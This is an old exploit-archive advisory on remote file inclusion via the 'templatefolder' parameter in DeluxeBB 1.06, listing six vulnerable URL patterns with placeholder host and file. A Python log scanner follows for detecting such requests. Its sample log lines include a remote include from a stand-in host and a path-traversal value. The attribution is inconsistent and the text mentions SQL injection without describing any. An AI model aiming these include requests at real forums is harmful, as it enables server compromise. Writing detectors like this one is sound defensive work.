DeluxeBB 1.06 templatefolder Remote File Include Vulnerabilities by h3m4n

Secunia Research has discovered some vulnerabilities in DeluxeBB,
which can be exploited by malicious people to conduct SQL injection
attacks and compromise a vulnerable system.

1) Input passed to the "templatefolder" parameter in various scripts
isn't properly verified before it is used to include files. This can
be exploited to include arbitrary files from external and local
resources.

Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]

# milw0rm.com [2006-06-15]




Andreas Sandblad                                                                       06/15/2006
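
A defender-side check for the requests described in the advisory, as an added example that is not part of the original advisory or of DeluxeBB: it scans web-server access-log lines for requests that pass "templatefolder" to a script under /templates/ and labels the value. The log format, the sample lines, the function names and the three labels are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a common/combined access-log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Template scripts under /templates/<theme>/ (paths as listed in the advisory).
TEMPLATE_PATH_RE = re.compile(r"/templates/[^/]+/(?:[^/]+/)*[^/]+\.php$", re.I)
# A value starting with a scheme (http:, ftp:, php:, ...) names a remote or wrapper source.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.I)


def classify(value):
    """Label a decoded templatefolder value by the kind of include target it names."""
    if SCHEME_RE.match(value) or value.startswith("//"):
        return "remote-or-wrapper"
    if ".." in value or value.startswith(("/", "\\")) or "\x00" in value:
        return "local-path"
    return "parameter-present"


def scan(lines):
    """Return (line_no, path, label) for each templatefolder seen on a template script."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        path = unquote(target.path)  # catch percent-encoded script names too
        if not TEMPLATE_PATH_RE.search(path):
            continue
        # parse_qsl percent-decodes names and values before they are compared.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name == "templatefolder":
                hits.append((line_no, path, classify(value)))
    return hits


# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jun/2006:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.77 - - [15/Jun/2006:10:00:05 +0000] "GET /templates/deluxe/postreply.php?templatefolder=http://example.invalid/x HTTP/1.1" 200 312',
    '192.0.2.77 - - [15/Jun/2006:10:00:09 +0000] "GET /templates/default/pm/newpm.php?templatefolder=..%2F..%2Flogs%2Fa HTTP/1.0" 200 88',
    '192.0.2.12 - - [15/Jun/2006:10:01:00 +0000] "GET /templates/deluxe/style.css HTTP/1.1" 200 900',
    '192.0.2.77 - - [15/Jun/2006:10:01:30 +0000] "GET /templates/default/posting.php?templatefolder=deluxe HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The "parameter-present" label rests on the assumption that ordinary forum traffic does not set this parameter on template scripts directly, so such hits are worth reviewing even when the value looks benign.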

								